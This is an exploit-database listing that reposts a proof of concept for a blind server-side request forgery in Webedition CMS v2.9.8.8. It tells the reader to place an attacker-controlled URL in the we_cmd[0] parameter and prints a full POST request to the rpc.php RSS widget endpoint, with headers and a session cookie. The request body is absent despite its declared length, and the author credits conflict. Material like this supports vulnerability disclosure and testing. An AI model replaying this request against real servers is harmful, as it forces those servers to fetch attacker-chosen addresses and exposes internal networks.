Webedition CMS Server-Side Request Forgery

CVE Category Price Severity
N/A CWE-918 $7,000 High
Author Risk Exploitation Type Date
Felix Hassert High Remote 2023-10-10
CVSS:4.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at:

Below is a copy:

Webedition CMS Server-Side Request Forgery
Exploit Title: Webedition CMS v2.9.8.8 - Blind SSRF
Application: Webedition CMS
Version: v2.9.8.8   
Bugs:  Blind SSRF
Technology: PHP
Vendor URL:
Software Link:
Date of found: 07.09.2023
Author: Mirabbas Aalarov
Tested on: Linux 

2. Technical Details & POC
write https://youserver/test.xml to we_cmd[0] parameter

poc request

POST /webEdition/rpc.php?cmd=widgetGetRss&mod=rss HTTP/1.1
Host: localhost
Content-Length: 141
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
sec-ch-ua-platform: ""
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/webEdition/index.php?we_cmd[0]=startWE
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: treewidth_main=300; WESESSION=41a9164e60666254199b3ea1cd3d2e0ad969c379; cookie=yep; treewidth_main=300
Connection: close


Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum